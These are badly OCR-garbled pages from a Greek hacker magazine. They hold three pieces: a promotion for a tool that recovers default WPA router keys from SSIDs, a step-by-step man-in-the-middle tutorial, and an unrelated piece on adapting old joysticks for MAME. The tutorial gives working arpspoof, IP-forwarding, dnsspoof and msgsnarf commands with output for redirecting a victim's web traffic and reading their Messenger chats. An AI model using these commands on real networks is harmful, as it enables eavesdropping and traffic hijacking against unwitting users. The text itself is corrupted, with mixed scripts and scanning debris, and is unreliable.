` - - SSID και παϊζοντας µε ra bytes του έτους, 
v А Ww της εβδομάδας παραγωγἠς και rou serial 
N š ΜΝ ARE number θα παράγει SHA1 hashes. Ano та 
* | € hashes αυτά, av τα έξι τελευταία ψηφία ενὸς 
à εἶναι ἴδια µε та ἐξι τελευταία bytes rou SSID, 
τότε τα δέκα прота ψηφία του idiou hash αποτελούν 

το ζητούμενο, εργοστασιακὀ WPA key. 


О сгасКег 


Mia υλοποίηση rov προηγουμένων ιδεὠν θα βρεἰτε oro πρὀγραμμὰ µας 
Reverse WiFi Cracker, To onoio unopeite να ζητήσετε p’ Eva απλὀ email 
ото 


cr@w@deltahacker.gr 


Στο ἰδιο mail µπορείτε va στείλετε στον δημιουργὀ του προγράµµατος TIG 
ὁποιες ερωτήσεις σας. Κάνοντας χρήση Brute Force / Rainbow Tables, то 
πρὀγραμμα εἶναι σε θέση va βρἰσκει το προεπιλεγμένο κλειδὶ WPA µε βάση ro 
εργοστασιακὀ SSID του ασύρματου δικτύου. Σημειώστε ὁτι, μεταξύ ἄλλων, 
ἐχει δοκιμαστεί για 55105 που αρχίζουν апо THOMSON, SPEEDTOUCH, 
O2WIRELESS, ORANGE, INFINITUM, ΟΥΤΕ, BIGPOND, ΒΒΟΧ, DMAX, 
PRIVAT και TN_PRIVATE_. Ακολουθούν τα Tpia βασικἁ βήματα nou κάνει 


o χρήστης του προγράµµατος. 


Βήμα 1. Από ro combo box ADAPTER επιλέγουμε την карта δικτύου 
που θέλουμε να χρησιμοποιήσουμε. Me ro Refresh ενηµερώ- 
VOUHE τη λἰστα µε τα διαθέσιµα δίκτυα. 


Βήμα 2. Επιλέγοντας το Auto Crack AP το npóypaupa προχωρά στη 
διαδικασἰα εύρεσης των κωδικών για ὁλα τα διαθέσιµα SSID. 


Βήμα 3. Δοκιμάζουμε να συνδεθούµε µε το ασύρματο δίκτυο προκει- 
μένου va επιβεβαιώσουμε ro key που µας υπέδειξε το npó- 
γραμμα (τη διαδικασία αυτή ο γράφων αποφάσισε va µην 
την αυτοματοποιήσει). 


Εναλλακτικά, ο χρήστης ἐχει τη δυνατότητα να δώσει ο ἰδιος το SSID nou 
θέλει (επιλογἠ Custom Crack). Μπορείτε u’ αυτόν τον τρὀπο να ψαρώσετε 
τους φίλους σας, δἰνοντάς τους το κλειδί που χρησιμοποιείται στον WiFi 
router τους :) Φυσικά, θα πρέπει να γνωρίζετε το αντίστοιχο SSID. 


Τέλος, η χρήση της επιλογἠς Generate Tables δημιουργεἰ ша βάση δεδο- 
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μένων р’ ὁλα τα πιθανὰ SSID και WEP/WPA keys. H διαδικασία χρειάζεται 
χρόνο για να ολοκληρωθεί, µετά ὁμως το прдүранна θ’ αναζητά то πιθανὀ 
κλειδὶ апо τη λίστα µε τα υπολογισμένα SSID, μειώνοντας ópauparikà το 
χρόνο εύρεσης. 


[Z] РЕР у0.95 SA KANAL v2.92 = Σ | 


File [ C:\cdrom\HIW\plugins\speedT ouchStates.dll 


File: {C:\cdrom\HIW plugins \speedTouchStates. dll 


| E: BASE64 table :: 00129438 :: 39E29438 


= r SHA1 [Ci :: 0009D724 :: 39D9D724 
Entrypoint: [00082881 EP Section: | a) 


File Offset: [00082881 First Bytes: [83,76,2408 |>] 


Linker Info: |8.0 Subsystem: |Win32 GUI | > 


[Microsoft Visual C++ 8.0 DLL Method2 


Multi Scan | | Task viewer | | Options | | About || Ext About Export. | | Close | 


IV Stay on top >| |< [Detected 2 crypto signatures (in 2.05) - 


ok i MM V M M I туне M Ere Emm] 
εικόνα 1. Mia γενικἠ προσέγγιση στην εύρεση rou aÀyopiOuou 
παραγωγής WEP/WPA keys περνάει μέσα апо την avá- 
λυση του εκτελέσιµου αρχείου εγκατἀστασης/ρύθµισης 
της συσκευής, µε τη χρήση των προγραμμάτων PE 
iDentifier και KANAL. 


№ IDA- Chero tw ба аЬ (sinstal.exe) - Running = —— _ πω. өө б ll ill ποια 


SA =-=- GM Ὁ I s 
ibat AX Pole ta τι 


Ар 
2 
Е 
2 
5 
E 
FEES 
3 Ὁ 0 
μα λα Dic DATA di mmt Fe ree reer ΠΊΕ 
Pubie CODE 2 ою Юю ОЗ ΠΕ ΠΠ 
Pubie DAA 2 Omo MoD O3 FFFFFEF ΠΠ 
pubic DATA 32 ΟῚ ОЮ ОЗ ΠΠ ΗΠΜΗ 
Pubie DATA 32 owo 000 ОЗ FFFFFEFE FFFFFFFF 
η мыс XN 2 Юй oo 0 ΕΡΕ EE 
Flags 60000020: Text executaple Readable Lc WE т εν 9 Ge PET 
Alignment — i default. Bie DA 2 ОЮ = 0000 003 ΕΕ FFEFFEFE 
Pubie CONST 2 ою юй шю «οὐ ою 
URS sss аме CONST 3; o 000 00 00 000 
ЗРЗЕ СВАТЫ ЗЕЕ Thomson Home Install Wizard I рк CONST 32 oo — 0000 000 000 
ext segnent para public "CODE" uses? - таме CODE 3; owo πὸ oo ον бю 
text Pubie DAA 1; oo oo owo oo 0000 
Paie CONST 32 (69 moo omo moo omo 
sune es:debug011, ss:debug011, ds: data, public CONST 3 owo o ою 00 000 
3 Pubie CONST 32 000 owp 000 000 шю 
ἘΞ REE IRE public DATA E 0000 0000 0000 0000 0000 
pubie DMA 2 ο owo ою 000 OD 
suo 101000 proc near ; CODE XREF: sub sü2030s094p pubie CONST 32 owo owo oo «Ὁ ою 
var 185 шга ptr -10n 
varê» awora ptr -ooh 
ب بے‎ 
fe eret24£c=Rnnn . ; ` 
تن‎ NL pma کم‎ сас ЕН. ШШЕ 
Sebugged applicesten -- 
MUYURIY A ja ail aa = тыне 
ЕРТЕУ : 
cr —€————— 
— 5 : 
пата ие а €———— 
Ὀλοονεά ανα τό κάνανε; ο ο 
انىس‎ e m— оалразебъввне E 
паа напа жен: ο. ο οπως ανα 
€——— ——— — 
пана атана аана ον νο ο ο 
паана маана аааз рана ο ης 


(ВЛ. πίσω σελἰδα) 
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eee — ——H— „— — — —  — — [elmi s 
йы e-s- anaa [mic ze mom zz ocAGdW ESEZGS za mm Sr ssa 
ditt AX R w manean ERI TESE S8 Fos Cons eT VOSS && 55 З 
L -329a aS OPK ass Day s 


Program Segmentation 


m τ [965 Imm а чы ш 
= рп R . ме — 000 32 охо 0x0 00 — 0000 — 0000 

= | jossei R Г шю 2 πω oo 00 000 ою 

Ere H low шш п о owo шю жю 0 

{00001000 BYTES: COLLAPSED secneNT debugoa7. PRESS KEYPAD Ер Н bre ою 2 mm om mm 000 шю 
аа p H э ою 2 om ою шю 00 ΚΘ 

же i δν шю z mm om 00 0m шю 

саарах» sonent MERON. PRESS neveno === το esr] Š asta ; = = E m a 

dron st Er : μπι om 2 ΕΡΕ итте HE яни ннн 

ον I RE E E pa x μα отш R m Να 
ЖОН S, (игш adress erro) p ЧЕ "n X mm om s 
= аёзутв ( 537978. pu H Pa om R 00 00 002 err FEEFFE 

= эмем ( 540672.) data R para 0003 R 0000 0000 — 0003 — FFFFFFFF FFFFFFFF 

p к mom 2 Um omo Uu тн ннн 

δω R Pa om ш mm omo oo reer tee 

= H μα om X 00 ἡ 

p Н 5 om п πω O NM u^ 

EES Кезмет R me ою 2 mm G mo 0m "m 
Scgnent permissions: Bead/Execute | Н эз ою 2 00 шю шю 00 00 
ert segment para public “CIE use η i me ою 2 mm om wn owo wm 
: лаа к мт mm R 00 00 шю 00 ою 
паша 22010. ba mm п om oo 00 00 ΚΘ 

ερ RII Dl me am 2 mm ою mo oo юш 

бњо R byte bd 2 0000 0x0 оо 00 00 

ою 0 32 0000 бю 00 00 ою 

терасна 2 om 00 шю 00 000 

pes 2 mm om о 00 (m 


Output 
E 


— 
Debugged applic 


тегәр арра 


Debugged applica: ana 


Bebugged appiicas: ο вве /ур:есаластісоттре» 
Debugged application ο P P— 
— applis 
Dabugged аруз 


Εικόνες 2 & 3 εικόνα 3 
Γνωρίζοντας πλέον 
τη ρουτίνα κρυ- 
πτογράφησης, HE 
τη βοήθεια ενός 
debugger σαν τον 
IDA μπορούμε va 
βρούμε пос na- 
páyovrai та WPA/ 
WEP keys. AvaAu- 
τικότερα, κάνουμε 
reversing στον KQ- 
δικα TOU εκτελέσι- 
μου εγκατάστασης/ 


m. Algorithm (1) Algorithm (2) Default KEY 
PUGHIONG WPA PSK TKIP Cracking 
νοδεύει Tov router. 80211 OPEN NONE 

Στην περίπτωση µας OTEd55f10 WPA_PSK CCMP 

ο προγραμματιστής Nektaria WPA PSK TKIP 


μάς βοήθησε σκό- glou 80211_OPEN WEP 
ра περισσότερο, PirateFM 80211 OPEN WEP 
καθώς ενηµέρωνε 
τον debugger µε 

τις POUTIVEG που 
εκτελούσε κάθε δια- 
δικασία! 


opyright 2011 By cr0w. Version 1.0 
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εικόνα 4. O reverse WiFi cracker µας εν ора εργασίας ;) 
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subZraw.defiant.gr 


Είµαστε κοινωνικοί - εἰδικά στον online κόσµο. 
Είμαστε αστείοι, ευφυείς και φινετσάτοι - ειδικά 
στον оп!їпе κόσµο. Είναι βέβαιο ότι έχουµε καβα- 
λήσει το καλάμι - και μάλλον το ΄χουµε καβαλήσει 
στον online *kat* στον offline κόσµο. Πολλοί από 
εσάς µάς γνωρίζετε. Ελάτε στα στέκια µας και πείτε 
στους άλλους ότι έχουµε καλές προθέσεις. 


А! Πλέον είµαστε και ανεξάρτητοι - και πολύ 
ορεξάτοι. 


Να τους το πείτε κι αυτό. 


ne ә” 


v 


by subZrau 


УУ НА@КЕ 


ÁN 


Кака τα ψέμματα. Εἶναι πολλὲς οι φορὲς nou αν η θεωρία δεν επαληθεύ- 
εται (εὐκολα) στην πράξη, τότε εἶναι κάπως δύσκολο va τη δεχτούμε ως 
έγκυρη. Στην περίπτωση που εξετάζουμε, αν δεν δούµε μερικὲς επιθέσεις 
ΜΙΤΜ τότε εἶναι μάλλον απἰθανο να πάρουμε στα σοβαρὰ την επικινδυ- 
νότητα της τεχνικής. Ακριβώς γι’ αυτὀ το λόγο θα σας δείξουμε пос ἑνας 
επιτιθέμενος εἶναι δυνατὸν va UNOKAEWEI To Messenger chat ενὸς ἄλλου 
χρήστη. Θα δούμε, εξάλλου, nog ο επιτιθέμενος μπορεἰ να στέλνει TO 
θύμα του στα site nou о ἰδιος θέλει, аут! γι’ αυτά που το θύμα επιχειρεἰ 
va επισκεφτεἰ. Па va τα πετύχει όλα αυτά o attacker οφείλει прота va 
εξαπολύσει Eva MITM attack. O καλύτερος тропос yia va δούµε noc Oa ro 
κάνει εἶναι για το υπόλοιπο του ἄρθρου να μπούμε στη θέση του. 


'OAa ὁσα χρειαζόμαστε για την επίθεση εἶναι ελεύθερα διαθέσιµα, open 
source εργαλεία. Μπορούμε να δουλέψουμε aNd οποιοδήποτε λειτουρ- 
γικὀ σύστημα (ναι, ακόμα κι ano Windows), όµως για λόγους ευκολίας 
επιλέγουμε TO Linux και συγκεκριµένα ro BackTrack (ἐκδοση 5 R1). Ano 
τη θεωρία, εξάλλου, εἶναι προφανὲς ὁτι yia να δουλέψει η επίθεση o 
attacker και To θύμα πρέπει να βρίσκονται µέσα στο ióio τοπικὀ δίκτυο 
(LAN). Ας ξεκινήσουμε, λοιπὀν, το BackTrack µας... 


Αναγνώριση 


Εἶναι χρήσιμο να γνωρίζουμε τη διεύθυνση IP Tou μηχανἡματὀς µας. Па 
va τη μάθουμε аркі у’ ανοϊξουµε Eva παράθυρο τερματικού και να χρη- 


RAnBivéc επιθέσεις MiTM! 


LLLI 


σιµοποιήσουμε ro εργαλεἰο ifconfig: 
root@bt:~# ifconfig 
еһе Link encap:Ethernet HwWaddr 00: 50:56:37:27:5е 


inet addr:10.20.30.108 Bcast:10.20.30.255 
Mask:255.255.255.0 


inet6 addr: fe80::250:56ff:fe37:275e/64 Scope:Link 


[snip] 
Ὅπως βλέπετε, TO IP του δικού µας υπολογιστή εἶναι TO 10.20.30.108. 
Προφανώς, όλα τα μηχανήματα rou LAN xouv IP της μορφής 10.20.30.*. 
Στο бїк© σας δίκτυο οι διευθύνσεις µπορεί va ‘val της µορφής 192.168.0.* 
ἡ 192.168.1.* ñ 10.0.0.* κ.ο.κ. Όπως και να ‘val, εἴδατε nog θα μάθετε. 
Πάμε тора να κάνουμε µια λεπτομερέστερη ανααγνώριση του τοπικού 
δικτύου. Καταφεύγουμε στις UNNPEOIEG TOU птар: 

root@bt:~# nmap -O -Pn 10.20.30.* 


Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-08-19 15:38 
EEST 


Nmap scan report for 10.20.30.1 

Host is up (0.0012s latency). 

MAC Address: 00:1D:7E:B4:8B:61 (Cisco-Linksys) 
Running: Linux 2.6.X 


Network Distance: 1 hop 

Nmap scan report for 10.20.30.5 

Host is up (0.00026s latency). 

MAC Address: 00:16:CB:9A:D0:26 (Apple Computer) 


No exact OS matches for host (If you know what OS is running on 
it, see http://nmap.org/submit/ ). 


Nmap scan report for 10.20.30.95 

Host is up (0.00036s latency). 

MAC Address: 00:19:66:3C:C8:4B (Asiarock Technology Limited) 
Running: Linux 2.6.X 

Network Distance: 1 hop 

Nmap scan report for 10.20.30.100 

Host is up (0.0043s latency). 

MAC Address: 3C:4A:92:45:DD:6A (Hewlett Packard) 
Device type: printer 

Running: HP embedded 

OS details: HP LaserJet M2727 printer 

Network Distance: 1 hop 

Nmap scan report for 10.20.30.104 

Host is up (0.0014s latency). 

MAC Address: 00:19:D2:45:F1:A3 (Intel) 


Warning: OSScan results may be unreliable because we could not 
find at least 1 open and 1 closed port 


Running (JUST GUESSING): Microsoft Windows 2008|7|Vista (95%) 
No exact OS matches for host (test conditions non-ideal). 
Network Distance: 1 hop 
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Nmap scan report for 10.20.30.108 

Host is up (0.000049s latency). 

А11 1000 scanned ports on 10.20.30.108 are closed 

Too many fingerprints match this host to give specific OS details 
Network Distance: 0 hops 


OS detection performed. Please report any incorrect results at 
http://nmap.org/submit/ . 


Nmap done: 256 IP addresses (6 hosts up) scanned in 54.82 
seconds 


(Πα λόγους οικονοµίας χώρου η ἐξοδος rou птар ἐχει NEPIKONEI.) 


Κοιτάζοντας προσεκτικἁ τ’ αποτελέσµατα που επιστρέφει το птар naip- 
νουµε µια πάρα поло кал ιδέα για Ta ενεργἁ μηχανήματα στο τοπικὀ µας 
δίκτυο, καθώς και για τους ρόλους τους. Συνοψἰίζοντας τ’ αποτελέσµατα 
για το δικὀ µας δίκτυο, η κατάσταση TN στιγμή των δοκιμών µας EIXE ως 
εξής: 


Διεύθυνση ЇР Τύπος συσκευής Λειτουργικὸ σύστημα 
10.20.30.1 router Linux 2.6.x 
10.20.30.5 υπολογιστής άγνωστο 
10.20.30.95 υπολογιστής Linux 2.6.x 
10.20.30.100 εκτυπωτἠς HP embedded 
10.20.30.104 υπολογιστής Windows 2008/Vista/7 
10.20.30.108 άγνωστο ἄγνωστο 


Αξίζει να σταθούμε σε μερικὲς γραμμὲς του πἱνακα. Στη 2η βλέπουμε бт! 
TO птар δεν κατάφερε να βρει το λειτουργικὀ σύστημα του υπολογιστή 
µε IP 10.20.30.5. AUTO συνέβη διότι το μηχάνημα ETPEXE το καινούργιο 
OS X Lion και τη στιγμή του κάναμε TIG δοκιμές µας то nmap δεν yvo- 
pie To fingerprint του εν λόγω λειτουργικού. Στην 4η γραμμή, εξάλλου, 
έχουμε ἑναν ÖIKTUAKO εκτυπωτή (yia την ακρίβεια Eva πολυμηχάνημα) 
της Hewlett Packard και στα πλαϊΐσια του παρὀντος άρθρου δεν 0’ ασχο- 
ληθούμε μαζί του. Στην 5η γραμμὴ ἐχουμε το IP ενὸς υπολογιστή µε 
Windows. Σίγουρα δεν μπορούμε у” αγνοήσουμε αυτὀν τον υπολογιστή 
-για την ακρἰβεια τον χρήστη Tou- алла κάθε πράγμα στην opa του |) 
Στην 6η και τελευταία γραμμή έχουμε Eva μυστήριο μηχάνημα, για το 
οποίο TO птар οὐτε το ρόλο του µπορεί va μαντέψει, OUTE TO λειτουργικὀ 
του σύστημα. Αν μάλιστα δεν εἰχαμε χρησιμοποιήσει το ifconfig πριν λίγο, 
οὐτε εμεἰὶς θα μπορούσαμε να μαντέψουμε τι στο кало εἰν’ auró! Εἰδατε, 
το BackTrack; Μια χαρά εφαρμόζει στην πράξη ro σλὀγκαν του :D (The 
quiter you become, the more you are able to hear...) 


H протп µας επίθεση MITM 


Apxikd βάζουμε στὀχο τον υπολογιστή ue To OS X Lion, ο οποίος ἐχει IP 
TO 10.20.30.5. To εργαλεἰο nou θα χρησιμοποιήσουμε λέγεται arpspoof κι 
ανήκει στο πακέτο dsniff, то onoio oro BackTrack εἶναι διαθέσιμο αµέσως 
µετά την εγκατάσταση του λειτουργικού. H χρήση του arpspoof εἶναι 
ιδιαἰτερα απλἠ: 


root@bt:~# arpspoof 


Version: 2.4 


RAnBivéc επιθέσεις MiTM! 


ЕЕЕ ССС ССС 


Usage: arpspoof [-i interface] [-t target] host 


Μιας και το μηχάνημα Tou παραδεἰγματὸς µας ἐχει uia µόνο карта ÖIKTU- 
ou (Eva network interface), μπορούμε ν΄’ αγνοήσουµε EVTEAWS την пара- 
μετρο -i. Στη δε παράμετρο -t θα δώσουμετο IP TOU στὀχου (10.20.30.5), 
EVO στη θέση Tou host θα βάλουμε ro IP Tou router µας (10.20.30.1). 
Πιο συγκεκριµένα, To MITM attack το ξεκινάμε πληκτρολογώντας To EENG 
απλό: 


root@bt:~# arpspoof -t 10.20.30.5 10.20.30.1 


0:50:56:37:27:5e 0:16:cb:9a:d0:26 0806 42: arp reply 10.20.30.1 
is-at 0:50:56:37:27:5e 
0:50:56:37:27:5e 0:16:cb:9a:d0:26 0806 42: arp reply 10.20.30.1 
is-at 0:50:56:37:27:5e 
0:50:56:37:27:5e 0:16:cb:9a:d0:26 0806 42: arp reply 10.20.30.1 
is-at 0:50:56:37:27:5e 


[snip] 

Τέλεια! H επίθεση εἶναι σε EEENMEN KI ὁπως μπορείτε 
να δεῖτε and ra MAC addresses, το BackTrack φω- 
νάζει διαρκῶς στον υπολογιστή µε το Lion λἐγοντάς 
TOU бт! αυτὸς εἰναι o router του δικτύου. Την ἴδια 
στιγµή, προς τον router rou δικτύου φωνάζει και 
λέει ὁτι αυτός εἶναι ο υπολογιστὴς µε TO Lion. =ё- 
PETE kári; Κανένα ano τα δύο μηχανήματα δεν ἐχει 
λόγο να µην πιστέψει To BackTrack ;) 


Υπάρχει όμως Eva πρὀβλημα: Evo то BackTrack 
παριστάνει τον router, στην πραγματικότητα δεν 
εκτελεἰ χρέη router KI ως αποτέλεσµα το μηχάνη- 
μα-στόχος χάνει τη σὐνδεσή του µε τον έξω KÒ- 
сро! Εννοείται πως кат! τέτοιο δεν το θέλουμε, 
οπότε καλύτερα va µη χάνουμε AMO χρόνο και va 
πούμε στο BackTrack να πιάσει δουλειὰ *ка!* ως 
router. Προς τούτο αρκεἰ va ενεργοποιήσουµε το 
λεγόμενο IP forwarding, στον πυρήνα του Linux. 

Αυτή η ενεργοποίηση γίνεται απείρως nio εὐκολα 

an’ ògo ακούγεται. Απλά ανοίγουμε алло Eva na- 

ράθυρο (ñ καρτἐλα) τερματικού KAI πληκτρολο- 

γούμε To εξἠς απλὀ: 


root@bt:~# echo 1 > /proc/sys/net/ipv4/ 
ip_forward 


Auto ἠταν. H σύνδεση rou θύματος EXE! anoka- 
τασταθεὶ KAI тора εμεὶς μπορούμε va προχωρή- 
σουµε OTA περαιτἐρω. 


Αλλοίωση DNS 


Ἀπαξ και ξεκινήσει µια επίθεση ΜΙΤΜ, Eva соро 
πράγματα μπορούν να συμβούν στο θύμα. Συ- 
χνὰ στο περιοδικὀ θα έχουμε την ευκαιρία va 
βλέπουμε πολλὰ και συγκεκριµένα παραδεϊγµα- 
τα τέτοιων “πραγμάτων” :) Προς το napov, ας 
υποθέσουμε бт! ο attacker ἐχει εντελώς αθῶες 
προθέσεις κι апла θέλει να διασκεδάσει λίγο µε 
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το θύμα του, το οποίο κάθεται AHEPIUVO μπροστά апо rov Mac του και 
περνάει την фра του µία oro Facebook, µία στο Twitter. "Xp, αυτό θα 
μπορούσε ν΄’ αλλάξει”, σκέφτεται ο attacker και χαμογελά. Το θύμα, n.x., 
θα μπορούσε να επισκέπτεται To Facebook και να καταλήγει στο επἰσιμο 
site Tou Anchorage της Alaska ἡ θα μπορούσε va πηγαίνει για ro Twitter 
αλλά va προσγειώνεται στο ταξιδιωτικὀ site της πολιτείας της Montana. 
Πρακτικὰ, auró nou θα κάνει ο attacker µας εἶναι να ξεχωρίζει όλα τα 
DNS querries που προέρχονται апо το μηχάνημα του θύματος κι ορισµέ- 
va ano аита να ra απαντάει εκείνος, στἐλνοντας ουσιαστικά το θύμα του 
εκεἰ που θέλει. 


To προγραμματὰκι που θα χρειαστεί o attacker yia у’ απαντά επιλεκτικἁ 
στα DNS querries του θύματος εἶναι το dnsspoof. Ὅπως ка! To arpspoof, 
ανήκει κι AUTO στο πακέτο dsniff, επομένως µιας κι ο επιτιθέμενος δου- 
Леуі ano BackTrack δεν χρειάζεται να εγκαταστήσει KÄTI για να προχω- 
ρήσει. Το μόνο που χρειάζεται εἶναι να φτιάξει Eva αρχείο απλού κειµένου 
µε γραμμὲς της μορφής 

IP_address domain_name 


Onou το IP address εἶναι η διεύθυνση IP Tou site στο οποίο θα καταλήγει 
το θύμα όταν пд να enickegrei To site µε ὀνομα domain name. Mévo- 
ντας στο ταξιδιωτικὀ theme, ας βρούμε πρῶτα TIG διευθύνσεις ІР των 
επἰσιμων τουριστικών site για To Anchorage (www.anchorage.net) και για 
τη Μοντάνα (visitmt.com): 


root@bt:~# nslookup www.anchorage.net 
Server: 8.8.8.8 

Address: 8.8.8.8#53 
Non-authoritative answer: 

Name: www. anchorage.net 
Address: 208.106.174.250 
root@bt:~# nslookup visitmt.com 
Server: 8.8.8.8 

Address: 8.8.8.8#53 
Non-authoritative answer: 

Name: visitmt.com 
Address: 161.7.8.140 


Ωραία. Μπορούμε тора va φτιάξουμε TO αρχειάκι µας, ro onoio ас ovo- 
μάσουμε myresolver.txt: 


root@bt:~# echo "208.106.174.250 facebook.com" >> ~/myresolver. 
txt 


root@bt:~# echo "161.7.8.140 twitter.com” >> ~/myresolver.txt 
Ιδού και ra περιεχὀμενἁ του: 

root@bt:~# cat ~/myresolver.txt 

208.106.174.250 facebook.com 

161.7.8.140 twitter.com 


Apkei тора va rpé&ouue ro dnsspoof, υποδεικνὐοντὰς του то αρχείο 
myresolver.txt: 


RAnBivéc επιθέσεις МІТМ! 
Z///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////7/ 
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root@bt:~# dnsspoof -i ethð -f ~/myresolver.txt 


dnsspoof: listening on еһе [udp dst port 53 and not src 
190.20.30.108] 


(ethO εἶναι η uia και μοναδικἠ карта δικτύου rou BackTrack box нас). 
Auto ἦταν! Με την προὐπόθεση От! To arpspoof τρέχει, το dnsspoof εἰ- 
vai σε θἐση va βλέπει όλα Ta DNS querries και σε ορισμένα an’ αυτά va 
απαντά EKEIVO аут! για κάποιον QÀÀov, κανονικὀ nameserver (βλ. εικὀνες 
1 και 2). Παρατηρήστε εδὠ ὁτι To dnsspoof δεν aoxoAgital µε Ta DNS 
querries του μηχανήματος ото onoio τρέχει ("...not 10.20.30.108"), YE- 
yovoc που σημαίνει ὁτι ο attacker δεν επηρεάζεται ano την επἰθεση. Па 
να σταματήσουμε ro dnsspoof πηγαίνουμε στο τερματικὀ nou τρέχει και 
πατάμε το συνδυασμὸ πλήκτρων [CTRL+C]. 


YnokAonr instant messaging 


Ас δούμε ropa πώς μπορούμε va διαβάζουμε τις συνομιλίες instant 
messaging, π.χ., µέσω Messenger, поо κἀνει το θύμα µε ἄλλους χρήστες 
- OXI κατ’ ανάγκη του ἰδιου τοπικού δικτύου! Αυτή τη фора θα στοχεύ- 
coupe To μηχάνημα µε Windows 7. Πηγαΐνουμε στην κονσόλα ὀπου τρέχει 
TO arpspoof, ro σταματάμε µε [CTRL+C] και ξεκινάμε Eva MITM attack 
προς τον υπολογιστή µε IP το 10.20.30.104: 


root@bt:~# arpspoof -t 10.20.30.104 10.20.30.1 


Qpaia. Μέσα στο πακέτο dsniff υπάρχει και To msgsnarf, ἄλλο Eva aupa- 
TOUPYO EpyaAEio που εἶναι трорактіка EUKOAO στη χρήση kai ικανὀ va Ka- 
ταγράφει συνομιλίες instant messaging. To ξεκινάμε πληκτρολογώντας 


root@bt:~$ msgsnarf -i εἴπ 
msgsnarf: listening on eth0 


Με To nou 0’ αρχίσει το θύμα va συνομιλεἰ μέσω Messenger, στην οθὀνη 
TOU τερματικού µας βλέπουμε OAN τη συνομιλία! 


Mia εὔκολη, δεδομένη αλλά κι εξαιρετικἀ ünouAn φίλη! 


Н επίθεση Man in The Middle εἶναι εξαιρετικἁ anAn στη σύλληψη και 
εκμεταλλεύεται την ἐλλειψη μηχανισμών πιστοποίησης στο πρωτὀκολο 
ARP. Όπως εἰδαμε, EKTÖG and απλἠ στη σύλληψη εἰναι και απλἠ στην 
υλοποίηση. Θα μπορούσαμε να πούμε ὁτι εἶναι ша апо τις καλύτερες фі- 
λες κάθε penetration tester αλλά και blackhat hacker. Εἶναι μάλιστα τόσο 
KAAN, που όλοι τους τη θεωρούν δεδομένη - και πράγματι εἶναι! Το θέμα 
εδώ εἶναι πως η επίθεση ΜΙΤΜ εἶναι *kaı* εξαιρετικἁ επικίνδυνη, αφού 
πέρα ano τις αθώες φάρσες µπορεί να χρησιμοποιηθεί για μεγάλο како, 
ὁπως, N.X., υποκλοπή ευαϊθητων προσωπικὠν δεδοµένων. To ευτύχημα 
εἶναι От! υπάρχουν τρόποι yia va αποφεύγουμετις συνἐπειὲς της. Διαβά- 
στε TO OXETIKO άρθρο online, στο 


http://deltahacker.gr/2011/09/30/arp-poisoning-alert 


НА C επιθέσεις ΜΙΤΗΙ 
MM, 
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Εικόνα 1 

То бт! μπορείτε va 
συνδέσετε πολλά 
πληκτρολόγια στο 
PC, το ξέρατε. To 
ότι µπορείτε να τα 
χρησιμοποιήσετε 
σαν ξεχωριστά 
χειριστήρια για TO 
MAME, το ξέρατε; 
Σε αυτή την πε- 
ρίπτωση BéBaia 
πρέπει να ενηµε- 
ρώσετε σχετικά TO 
ΜΑΜΕ, ενεργοποι- 
ὠντας την επιλογή 
Multiple keyboards 
апд To MAMEUI. 


VHAOKER 


ÁN 


Χειμώνας. Φιλοξενώ vav παιδικὀ φίλο κι έχουμε λιώσει στο MAME. Εἶναι 
μια and εκείνες τις φορὲς που θυμόμαστε та пала - ἡ τουλάχιστον про- 
σπαθούμε. Τα κουμπιά του πληκτρολογίου, βλέπετε, δεν αποδίδουν την 
αἰσθηση των παλιών Arcade, που ταΐζαμε µε απειραριθµήσιµα кёрџата. Το 
σημαντικὀτερο απ΄ όλα; AVTEXOUV πολύ λιγότερο! Σαν καλὸς οικοδεσπὀ- 
της, λοιπόν, αποφασἰίζω ν΄’ αναβαθµίσω τη διασκἐδασἠ µας... 


Н αξία της "oapBoupag” 


Н αρχικἠ µου ιδέα ἦταν anAn: Θα ἐπαιρνα εκεἰνα τα πανάρχαια joystick 
που 'xa κρατήσει апо την εποχἠ των παιχνιδομηχανών Atari kai Ва Ta ou- 
νέδεα στον υπολογιστή!. Μιλάω για ᾿κεἰνα τα μεγάλα, μαύρα Joystick ελ- 
ληνικὴς κατασκευἠς, µε το βαρύ μεταλλικὸ μοχλὸ και το μεγάλο κόκκινο 
κουμπἰ. Φυσικά το βύσμα τους δεν μπαίνει πουθενὰ στον υπολογιστή KI 
000 για το πρωτόκολλο επικοινωνίας, χμ, αρκεί va no бт! το RS-232 των 
παλιών OEIPAIKWV θυρών εἶναι πολύ πιο μοντέρνο! Ἔτσι, χωρὶς πολλά- 
πολλὰ, τ’ ανοίγω, ξηλώνω OAG ra NÄEKTPOVIKA και κρατάω µόνο ra µηχα- 
міка µέρη (τους διακόπτες, το роҳло και το µεγάλο κουμπΙ). Αμέσως µετά 
διαλύω προσεκτικἁ και δύο παλιά/φτηνάἁ πληκτρολόγια USB. Δεν µε εἶχε 
πιάσει каша pavia καταστροφής. Ἠθελα µόνο τα κυκλώματά τους, pači 
HE το καλώδιο yia τη σύνδεση στον υπολογιστή. Στη συνέχεια τοποθετώ 
-yia την ακρίβεια στουμπώνω- EVA KUKAWH σε ká8e joystick και συνδέω 
τους διακόπτες στις κατάλληλες επαφὲς της 
πλακέτας фот κάθε kivnon του μοχλού ν΄ 
αντιστοιχεί στο πάτημα rou AVTIOTOIXOU BE- 


Global game options 
Default options used by all games 


Joystick deadzone 
mf} 


Joystick saturation 
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Enable mouse input 


] Enable steadykey support 


У | Enable joystick input 


λους στο πληκτρολόγιο, EVO то πάτημα του 
κουμπιού του joystick ν΄ αντιστοιχεἰ στο nà- 
" τηµα ενὸς γράμματος. Αυτό ñTav! Τα παλιά 
joystick μετατρέπονται σε δύο ιδιόρρυθµα 
πληκτρολόγια USB, καθένα ano τα οποία δια- 
θέτει πέντε μόλις κουμπιά: Ta τἐσσερα βελά- 
κια κι Eva γράμμα. 


Default input layout 


Πλέον, ἡμουν ἑτοιμος va αξιοποιήσω pia 
ano τις axpnotes nAnpo@opies που επίσης 
συνηθίζω va “σαβουρώνω”, θεωρώντας ӧті 
κάποια στιγμή θα µου χρειαστεί; ;) Το МАМЕ 
ἐχει µια επιλογἠ που του επιτρέπει να ξεχω- 
ρίζει Ta πληκτρολόγια που ἐχουμε συνδέσει 
στον υπολογιστή µας, ὁσα κι αν εἶναι aura. 


[7] Enable lightgun input 
C] Offscreen shots reload 
[C] Dual lightguns 

[V] Multiple keyboards 

[E] Multiple mice 


Ακόμα KI av πατάμε то ἰδιο πλήκτρο σε κάθε 


Πληκτρολόγιο, το ΜΑΜΕ αντιλαμβάνεται τη 
